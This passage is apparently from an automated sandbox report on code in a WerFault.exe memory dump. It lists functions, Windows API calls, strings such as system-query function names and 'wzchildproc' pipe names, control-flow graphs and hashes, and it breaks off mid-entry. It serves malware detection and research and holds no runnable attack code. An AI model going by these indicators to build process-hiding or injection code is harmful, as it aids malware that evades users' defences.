                                                                                                                                                                                                                                                Function 00000265B3C012BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 2005889112-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction ID: 933416470bf91a19b4e498ec88dd264e59b18fbaf5a7c8b78ab72bac9e2d62f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77516076200FA496EB50CFA2E44835AB7A1FB89F99F244124DE891772CDF3EC055CB00
                                                                                                                                                                                                                                                Function 00000265B3C01D1C Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: 5adf43ebddf11eade95878041d7ab360bf26ad57597a7c89bca3808db41e5037
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB3190B8210EBAA4EA05EFE5EC5D7E46321AF4434CFD01493940A3717E9F7A824EDB40
                                                                                                                                                                                                                                                Function 00000265B3C0D398 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00000265B3C0D3A7
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D3BC
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D3DD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D40A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D41B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D42C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 00000265B3C0D447
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D47D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000265B3C0F23C,?,?,?,?,00000265B3C0C50F,?,?,?,?,?,00000265B3C07AC0), ref: 00000265B3C0D49C
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C0DC3C: HeapAlloc.KERNEL32 ref: 00000265B3C0DC91
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D4C4
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C0DCB4: HeapFree.KERNEL32 ref: 00000265B3C0DCCA
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C0DCB4: GetLastError.KERNEL32 ref: 00000265B3C0DCD4
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D4D5
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D4E6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 570795689-0
                                                                                                                                                                                                                                                • Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction ID: ba8a9e7bff2a794a500c3c63bec6bc956971efab6360a7702da30acbb626b26d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A041BD34304FF082FA58A7F2995D72962429F447BCF1417A4A93ABB7DFDE2B94458E00
                                                                                                                                                                                                                                                Function 00000265B3C0224C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2171963597-1908187885
                                                                                                                                                                                                                                                • Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction ID: fb0b3187f870eaa793dbce2cf3c144504233a63520bb5262f31129d67ba5d86a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC213D36614FA092EB10CF65E44835A73A0FB89BA9F604215EE5912BACCF7DC159CF00
                                                                                                                                                                                                                                                Function 00000265B3C0AAF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 428 265b3c0aaf0-265b3c0ab57 call 265b3c0ba08 431 265b3c0afb8-265b3c0afbf call 265b3c0ccb8 428->431 432 265b3c0ab5d-265b3c0ab60 428->432 432->431 433 265b3c0ab66-265b3c0ab6c 432->433 435 265b3c0ac3b-265b3c0ac4d 433->435 436 265b3c0ab72-265b3c0ab76 433->436 438 265b3c0af08-265b3c0af0c 435->438 439 265b3c0ac53-265b3c0ac57 435->439 436->435 440 265b3c0ab7c-265b3c0ab87 436->440 443 265b3c0af45-265b3c0af4f call 265b3c08c04 438->443 444 265b3c0af0e-265b3c0af15 438->444 439->438 441 265b3c0ac5d-265b3c0ac68 439->441 440->435 442 265b3c0ab8d-265b3c0ab92 440->442 441->438 445 265b3c0ac6e-265b3c0ac75 441->445 442->435 446 265b3c0ab98-265b3c0aba2 call 265b3c08c04 442->446 443->431 457 265b3c0af51-265b3c0af70 call 265b3c07950 443->457 444->431 447 265b3c0af1b-265b3c0af40 call 265b3c0afc0 444->447 449 265b3c0ae39-265b3c0ae45 445->449 450 265b3c0ac7b-265b3c0acb6 call 265b3c09da0 445->450 446->457 461 265b3c0aba8-265b3c0abd3 call 265b3c08c04 * 2 call 265b3c0a0a8 446->461 447->443 449->443 454 265b3c0ae4b-265b3c0ae4f 449->454 450->449 466 265b3c0acbc-265b3c0acc5 450->466 458 265b3c0ae5f-265b3c0ae67 454->458 459 265b3c0ae51-265b3c0ae5d call 265b3c0a068 454->459 458->443 465 265b3c0ae6d-265b3c0ae7a call 265b3c09c40 458->465 459->458 472 265b3c0ae80-265b3c0ae88 459->472 494 265b3c0abd5-265b3c0abd9 461->494 495 265b3c0abf3-265b3c0abfd call 265b3c08c04 461->495 465->443 465->472 470 265b3c0acca-265b3c0acfc 466->470 474 265b3c0ae28-265b3c0ae2f 470->474 475 265b3c0ad02-265b3c0ad0e 470->475 477 265b3c0af9b-265b3c0afb7 call 265b3c08c04 * 2 call 265b3c0cc18 472->477 478 265b3c0ae8e-265b3c0ae92 472->478 474->470 481 265b3c0ae35 474->481 475->474 479 265b3c0ad14-265b3c0ad2d 475->479 477->431 482 265b3c0aea5 478->482 483 265b3c0ae94-265b3c0aea3 call 265b3c0a068 478->483 485 265b3c0ae25 479->485 486 265b3c0ad33-265b3c0ad78 call 265b3c0a07c * 2 479->486 481->449 491 265b3c0aea8-265b3c0aeb2 call 265b3c0baa0 482->491 483->491 485->474 510 265b3c0adb6-265b3c0adbc 486->510 511 265b3c0ad7a-265b3c0ada0 call 265b3c0a07c call 265b3c0b230 486->511 491->443 506 265b3c0aeb8-265b3c0af06 call 265b3c09cd0 call 265b3c09ed4 491->506 494->495 501 265b3c0abdb-265b3c0abe6 494->501 495->435 513 265b3c0abff-265b3c0ac1f call 265b3c08c04 * 2 call 265b3c0baa0 495->513 501->495 507 265b3c0abe8-265b3c0abed 501->507 506->443 507->431 507->495 517 265b3c0adbe-265b3c0adc2 510->517 518 265b3c0ae20 510->518 527 265b3c0adc7-265b3c0ae1b call 265b3c0aa1c 511->527 528 265b3c0ada2-265b3c0adb4 511->528 532 265b3c0ac36 513->532 533 265b3c0ac21-265b3c0ac2b call 265b3c0bb90 513->533 517->486 518->485 527->518 528->510 528->511 532->435 536 265b3c0af95-265b3c0af9a call 265b3c0cc18 533->536 537 265b3c0ac31-265b3c0af94 call 265b3c08864 call 265b3c0b5ec call 265b3c08a58 533->537 536->477 537->536
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: b126d96e713e17712899e8751b41c7f8822b7172a83e217d75a36f3f2e99f09a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0D1AC76604BB08AEB60DFA5D48839D77A0FB45B8CF104255EE8D67B9ADB36D490CB00
                                                                                                                                                                                                                                                Function 00000265B3C0F904 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: fa292ae88bf309691171d7b37f29d7321a702e3f5bc588aa8e872300ce44a39d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6241E432311EB051FA55CB96A80CB962395BF49FE8F194125DD0DBB78CEF3AC4858700
                                                                                                                                                                                                                                                Function 00000265B3C0104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 577 265b3c0104c-265b3c010b9 RegQueryInfoKeyW 578 265b3c011b5-265b3c011d0 577->578 579 265b3c010bf-265b3c010c9 577->579 579->578 580 265b3c010cf-265b3c0111f RegEnumValueW 579->580 581 265b3c011a5-265b3c011af 580->581 582 265b3c01125-265b3c0112a 580->582 581->578 581->580 582->581 583 265b3c0112c-265b3c01135 582->583 584 265b3c01147-265b3c0114c 583->584 585 265b3c01137 583->585 586 265b3c01199-265b3c011a3 584->586 587 265b3c0114e-265b3c01193 GetProcessHeap call 265b3c16168 GetProcessHeap HeapFree 584->587 588 265b3c0113b-265b3c0113f 585->588 586->581 587->586 588->581 590 265b3c01141-265b3c01145 588->590 590->584 590->588
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 953c94f313aa51b2b07815c0b7c674d28838e84e1a507797bbfd9e073ae97e59
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90418F37214FA4D6E7A4CF61E44839AB7A1F788B88F548129DA891775CDF3AC545CB00
                                                                                                                                                                                                                                                Function 00000265B3C0D5D8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: 4f203283e50808a10e8c9f0b83b36f37aca73b7da4e54cbee02c12fad81ece88
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06119030304FF081FA58A7A2695D72D2242AF447FCF0457A4A83DA77DEDE2AC5454E00
                                                                                                                                                                                                                                                Function 00000265B3C07520 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: ef4e31b1861857ac6e5888225eeee932d3457fbbc8bf0dcff6ebad1572a66948
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5181F779600FF146FB58ABE9944D39922E0AF8578CF744095AA097379EEB3BC941CF00
                                                                                                                                                                                                                                                Function 00000265B3C0A148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 67d4d90453a5e8255ef5c2ce1f0a143d5e4cb54238212338619f91891ec69ad2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31C136312EB0E1EE55DBC2E8083552394BF44BA8F6A46359D1D2B398DF3BD4948B00
                                                                                                                                                                                                                                                Function 00000265B3C14324 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: ec98bbe983424d857dbb2e910f9d1d79588046cf703999e266e6c01844fab790
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6118231314E7086E7908B92F85831972B4FB88FE8F644214EE5A977A8CF7AC414D744
                                                                                                                                                                                                                                                Function 00000265B3C037A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: 4bf4458373cbfe68d8e3ce14a3826da9e65b1fe10d7ff6e8b3832059c8e19638
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C211A136300F6092EF549B92F44C36A63A0FF88B88F140069DE8913B98EF3EC504CB08
                                                                                                                                                                                                                                                Function 00000265B3C05B40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1666949209-0
                                                                                                                                                                                                                                                • Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction ID: a6f8fc61d4b3fea6dc9a66bb71ad91eead48e29e30ad2566b163d4c39b602173
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD1A876208FA882DA709B5AE49835AB7B0F7C8B88F105156EACD577A9DF3DC541CF00
                                                                                                                                                                                                                                                Function 00000265B3C014A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-2813204550
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: faa364e1d180861c150d5367ca9f40bfb18301776936922f6671f5fd3eaadef4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D3181B7509EF0AAE391CBF9D8592596FA0FB85F48F398015DEC42335BDA279421D700
                                                                                                                                                                                                                                                Function 00000265B3C0D510 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: 3573062f26d348e38c1b0aac189e5c17a412a166efee5738f7d7f3ea1f1b6ae3
